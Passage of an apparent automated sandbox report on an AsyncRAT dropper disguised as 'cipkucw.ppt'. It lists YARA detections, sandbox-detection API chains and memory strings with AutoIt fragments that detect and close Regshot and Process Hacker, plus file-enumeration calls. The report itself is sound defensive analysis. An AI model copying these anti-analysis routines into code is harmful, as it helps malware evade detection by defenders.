          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Yara detected AntiVM autoit script
          Source: Yara matchFile source: Process Memory Space: cipkucw.ppt PID: 1420, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: cipkucw.ppt.exe PID: 3484, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: cipkucw.ppt.exe PID: 3732, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: cipkucw.ppt.exe PID: 5780, type: MEMORYSTR
          Yara detected AntiVM3
          Source: Yara matchFile source: Process Memory Space: cipkucw.ppt PID: 1420, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: cipkucw.ppt.exe PID: 3484, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: cipkucw.ppt.exe PID: 3732, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: cipkucw.ppt.exe PID: 5780, type: MEMORYSTR
          Yara detected AsyncRAT
          Source: Yara matchFile source: 17.3.cipkucw.ppt.exe.d56820.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 19.3.cipkucw.ppt.exe.1854810.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 16.2.RegSvcs.exe.760000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.3.cipkucw.ppt.exe.d35810.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.3.cipkucw.ppt.exe.175e018.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.3.cipkucw.ppt.fb2828.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.3.cipkucw.ppt.f91818.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 19.3.cipkucw.ppt.exe.1854810.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 19.3.cipkucw.ppt.exe.1875820.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000011.00000003.2138978432.0000000003626000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000003.2001032731.000000000173E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000003.2000519761.000000000174E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.4092763243.0000000003721000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000003.1874054223.000000000361A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000003.2219656121.0000000001845000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000003.2000805264.0000000003E3C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000003.1873750371.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000003.2000748696.000000000174E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000003.1873380040.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.2048370610.0000000000762000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000003.2139352487.0000000000D26000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000003.2219758241.0000000003CBA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000003.2218782677.0000000001866000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000003.2138543622.0000000000D47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000003.2219549632.0000000001866000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000003.2138854777.0000000000D47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000003.1874482943.0000000000F82000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000003.2001114393.0000000001628000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000003.2219993576.0000000001854000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: cipkucw.ppt PID: 1420, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2800, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: cipkucw.ppt.exe PID: 3484, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2368, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: cipkucw.ppt.exe PID: 3732, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: cipkucw.ppt.exe PID: 5780, type: MEMORYSTR
          Found API chain indicative of sandbox detection
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: cipkucw.ppt.exe, 0000000F.00000003.2022211718.00000000015FA000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.2021396423.00000000015EE000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.2021523014.00000000015F5000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.2021288890.000000000158F000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.2021220494.000000000158B000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000002.2023014076.00000000015FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXE
          Source: cipkucw.ppt.exe, 00000011.00000003.2165739179.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000003.2166399836.0000000000BE9000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000003.2160554746.0000000000B7E000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000002.2168766408.0000000000BEB000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000003.2165802750.0000000000BE7000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000003.2167635107.0000000000BE9000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000003.2165513335.0000000000BCF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGSHOT.EXEQ
          Source: cipkucw.ppt, 00000006.00000002.1902115604.0000000000E4E000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1894957701.0000000000E4D000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1895348993.0000000000E4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGSHOT.EXES;
          Source: cipkucw.ppt, 00000006.00000003.1874054223.000000000361A000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1873750371.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1873380040.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1874482943.0000000000F82000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.4092763243.0000000003721000.00000004.00000800.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.2001032731.000000000173E000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.2000519761.000000000174E000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.2000805264.0000000003E3C000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.2000748696.000000000174E000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.2001114393.0000000001628000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
          Source: cipkucw.ppt, 00000006.00000003.1898895696.0000000000DB4000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1894741110.0000000000D9D000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1900546732.0000000000DB4000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1791493766.0000000000D84000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1895278716.0000000000DB3000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1900659369.0000000000DB6000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1894814022.0000000000DA6000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000002.2022870564.0000000001565000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.1947893692.0000000001534000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.2021946985.0000000001564000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.1947955595.0000000001544000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSCLOSE("REGSHOT.EXE")
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000007508000.00000004.00000020.00020000.00000000.sdmp, xdgrnj.pdf.6.dr, xdgrnj.pdf.0.drBinary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THEN
          Source: cipkucw.ppt.exe, 0000000F.00000003.2022211718.00000000015FA000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.2021396423.00000000015EE000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.2021523014.00000000015F5000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.2021288890.000000000158F000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.2021220494.000000000158B000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000002.2023014076.00000000015FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGSHOT.EXES)0E
          Source: cipkucw.ppt.exe, 0000000F.00000003.2022211718.00000000015FA000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.2021396423.00000000015EE000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.2021523014.00000000015F5000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.2021288890.000000000158F000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.2021220494.000000000158B000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000002.2023014076.00000000015FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGSHOT.EXE;7W
          Source: cipkucw.ppt.exe, 00000011.00000003.2165739179.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000003.2166399836.0000000000BE9000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000003.2160554746.0000000000B7E000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000002.2168766408.0000000000BEB000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000003.2165802750.0000000000BE7000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000003.2167635107.0000000000BE9000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000003.2165513335.0000000000BCF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGSHOT.EXES
          Source: cipkucw.ppt.exe, 00000011.00000003.2161007589.0000000000B49000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000003.2160782741.0000000000B47000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000003.2165609546.0000000000B4A000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000003.2167250522.0000000000B52000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000003.2160662377.0000000000B3E000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000003.2089984383.0000000000B34000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSCLOSE("REGSHOT.EXE"){
          Source: cipkucw.ppt.exe, 0000000F.00000003.2021347301.0000000001567000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.1947893692.0000000001534000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.1947955595.0000000001544000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000002.2022886035.0000000001568000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.2021220494.000000000154F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THENS
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000007508000.00000004.00000020.00020000.00000000.sdmp, xdgrnj.pdf.6.dr, xdgrnj.pdf.0.drBinary or memory string: PROCESSCLOSE("REGSHOT.EXE")
          Source: cipkucw.ppt.exe, 00000013.00000003.2240621163.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000013.00000003.2240877457.0000000001704000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000013.00000003.2240251372.0000000001699000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000013.00000003.2242293917.0000000001706000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000013.00000002.2243302839.0000000001708000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000013.00000003.2240734384.00000000016EF000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000013.00000003.2240529759.000000000169A000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000013.00000003.2240806388.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXE#PTV
          Source: cipkucw.ppt.exe, 00000013.00000003.2240621163.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000013.00000003.2240877457.0000000001704000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000013.00000003.2240251372.0000000001699000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000013.00000003.2242293917.0000000001706000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000013.00000002.2243302839.0000000001708000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000013.00000003.2240734384.00000000016EF000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000013.00000003.2240529759.000000000169A000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000013.00000003.2240806388.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGSHOT.EXES1QFU
          Source: cipkucw.ppt, 00000006.00000002.1902115604.0000000000E4E000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1894957701.0000000000E4D000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1895348993.0000000000E4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXEQ
          Source: cipkucw.ppt.exe, 0000000F.00000002.2022870564.0000000001565000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.1947893692.0000000001534000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.2021946985.0000000001564000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.1947955595.0000000001544000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.2021220494.000000000154F000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000003.2167687728.0000000000B53000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000003.2167393011.0000000000B53000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000003.2161007589.0000000000B49000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000002.2168529996.0000000000B53000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000003.2160782741.0000000000B47000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSCLOSE("PROCESSHACKER.EXE")
          Source: cipkucw.ppt.exe, 00000011.00000003.2165739179.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000003.2166399836.0000000000BE9000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000003.2160554746.0000000000B7E000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000002.2168766408.0000000000BEB000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000003.2165802750.0000000000BE7000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000003.2167635107.0000000000BE9000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000003.2165513335.0000000000BCF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXE2
          Source: cipkucw.ppt.exe, 00000011.00000002.2168460172.0000000000B44000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000003.2160662377.0000000000B3E000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000003.2089984383.0000000000B34000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000003.2165468576.0000000000B43000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000013.00000002.2243058111.0000000001662000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000013.00000003.2169741176.0000000001654000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000013.00000003.2240251372.000000000165D000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000013.00000003.2169637016.0000000001643000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THEN
          Source: cipkucw.ppt, 00000006.00000002.1902115604.0000000000E4E000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1894957701.0000000000E4D000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1895348993.0000000000E4E000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000013.00000003.2240621163.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000013.00000003.2240877457.0000000001704000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000013.00000003.2240251372.0000000001699000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000013.00000003.2242293917.0000000001706000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000013.00000002.2243302839.0000000001708000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000013.00000003.2240734384.00000000016EF000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000013.00000003.2240529759.000000000169A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGSHOT.EXE
          Source: cipkucw.ppt, 00000006.00000003.1898895696.0000000000DB4000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1894741110.0000000000D9D000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1900546732.0000000000DB4000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1791493766.0000000000D84000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1895278716.0000000000DB3000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1894814022.0000000000DA6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSCLOSE("PROCESSHACKER.EXE")Z(
          Source: cipkucw.ppt, 00000006.00000003.1894814022.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1894993535.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1791493766.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000002.1901823568.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1900659369.0000000000DD8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THENI
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000006B08000.00000004.00000020.00020000.00000000.sdmp, xdgrnj.pdf.6.dr, xdgrnj.pdf.0.drBinary or memory string: PROCESSCLOSE("PROCESSHACKER.EXE")
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeWindow / User API: threadDelayed 3409Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeWindow / User API: threadDelayed 6399Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptAPI coverage: 5.6 %
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeAPI coverage: 5.2 %
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe TID: 3428Thread sleep count: 68 > 30
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe TID: 3428Thread sleep count: 173 > 30
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe TID: 3428Thread sleep count: 127 > 30
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeFile Volume queried: C:\ FullSizeInformation
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeFile Volume queried: C:\ FullSizeInformation
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeCode function: 0_2_0027F826 __EH_prolog3_GS,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0027F826
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeCode function: 0_2_00291630 __EH_prolog3_GS,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,0_2_00291630
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptCode function: 6_2_0075E387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,6_2_0075E387
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptCode function: 6_2_0075D836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,6_2_0075D836
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptCode function: 6_2_0075DB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,6_2_0075DB69
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptCode function: 6_2_00769F9F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,6_2_00769F9F
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptCode function: 6_2_0076A0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,6_2_0076A0FA
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptCode function: 6_2_0076A488 FindFirstFileW,Sleep,FindNextFileW,FindClose,6_2_0076A488
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptCode function: 6_2_007665F1 FindFirstFileW,FindNextFileW,FindClose,6_2_007665F1
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptCode function: 6_2_00767248 FindFirstFileW,FindClose,6_2_00767248
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptCode function: 6_2_007672E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,6_2_007672E9
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeCode function: 15_2_0102E387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,15_2_0102E387
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeCode function: 15_2_0102D836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,15_2_0102D836
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeCode function: 15_2_0102DB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,15_2_0102DB69
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeCode function: 15_2_01039F9F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,15_2_01039F9F
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeCode function: 15_2_0103A0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,15_2_0103A0FA
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeCode function: 15_2_010365F1 FindFirstFileW,FindNextFileW,FindClose,15_2_010365F1
